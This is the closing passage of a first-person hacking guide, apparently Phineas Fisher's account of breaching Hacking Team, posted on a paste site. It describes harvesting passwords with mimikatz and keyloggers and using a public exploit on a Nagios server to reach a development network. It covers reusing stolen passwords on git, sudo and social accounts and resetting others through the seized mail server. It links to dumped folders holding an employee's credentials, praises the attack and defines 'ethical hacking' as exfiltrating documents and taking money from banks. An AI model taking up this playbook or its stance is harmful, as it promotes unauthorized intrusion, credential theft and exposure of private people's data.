- passwords (and at Christian Pozzi in general, who offered plenty of
- material for comedy [6][7][8][9]). I included them in the dump for a
- laugh, and to show how clueless he is. The reality is that mimikatz
- and keyloggers got all the passwords as well.
- [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
- [2] http://www.hammer-software.com/wmigphowto.shtml
- [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
- [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
- [5] http://pwnwiki.io/#!presence/windows/find_files.md
- [6] http://archive.is/TbaPy
- [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
- [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
- [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
- ----[ 15 - The bridge ]---------------------------------------------
- Inside Christian Pozzi's encrypted volume, there was a textfile with a
- number of passwords [1]. One of those was for a Fully Automated Nagios
- server, which had access to the sviluppo network so that it could
- monitor it. I had found the bridge. I only had the password for the
- web interface, but I had a public exploit [2] to execute code and
- obtain a shell (it's an unauthenticated exploit, but needs a user to
- have already initiated a session, using one of the passwords in the
- textfile).
- [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
- [2] http://seclists.org/fulldisclosure/2014/Oct/78
- ----[ 16 - Reusing and resetting passwords ]------------------------
- Reading the emails, I saw Daniele Milan granting access to the git
- repositories. I already had his Windows password, thanks to mimikatz.
- I tried it on the git server, and it worked. I tried it with sudo, and
- it worked. For the gitlab server, and his twitter account, I used the
- 'I forgot my password' function, and accessed the mail server to reset
- the password.
- ----[ 17 - Conclusion ]---------------------------------------------
- That's it. It's that easy to overthrow an enterprise and put a stop
- its human rights abuses. That is the beauty and the asymmetry of
- hacking: with just one hundred hours of work, one person can undo
- years of work by a multi-million-dollar enterprise. Hacking gives us
- the dispossessed the ability to fight and win.
- Hacking guides usually end with a warning: This information is solely
- for educational purposes. Be an ethical hacker. Do not attack
- computers without permission. Blah, blah, blah. I'm going to say the
- same thing, but with a more rebellious conception of 'ethical'
- hacking. Ethical hacking means exfiltrating documents, expropriating
- money from the banks, and protecting the computers of the common
- people. However, most of the people who call themselves 'ethical
- hackers' work only to protect the ones that pay their consulting fees,
- and so they usually end up being mercenaries more than hackers.
- Hacking Team saw themselves as belonging to a long line of inspired
- Italian design [1]. I see Vincenzetti, his business, and his friends
- in politics, in the police, and in government, as belonging to a long
- tradition of Italian fascism. I want to dedicate this guide to the
- victims of the assault on the Armando Diaz school, and to all those
- whose blood has been spilled at the hands of Italian fascism.
- [1] https://twitter.com/coracurrier/status/618104723263090688
- ----[ 18 - Contact ]------------------------------------------------
- To send me spearphishing attempts, write me death threats in Italian
- [1][2], and send me 0days granting access banks, corporations,
- governments, etc.
- [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
- [2] https://twitter.com/CthulhuSec/status/619459002854977537
- encrypted emails only, please:
- https://securityinabox.org/es/thunderbird_usarenigmail
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
- vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
- 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
- +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
- VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
- Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
- Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
- BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
- QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
- cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
- JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
- 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
- X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
- VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
- oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
- n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
- Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
- WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
- jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
- CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
- OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
- LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
- JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
- Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
- D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
- =E5+y
- -----END PGP PUBLIC KEY BLOCK-----
- If not you, who? If not now, when?
- _ _ _ ____ _ _
- | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
- | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
- | _ | (_| | (__| < | |_) | (_| | (__| <|_|
- |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
- by Phineas Fisher
- trans. 0xdeba5e12
- (END)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement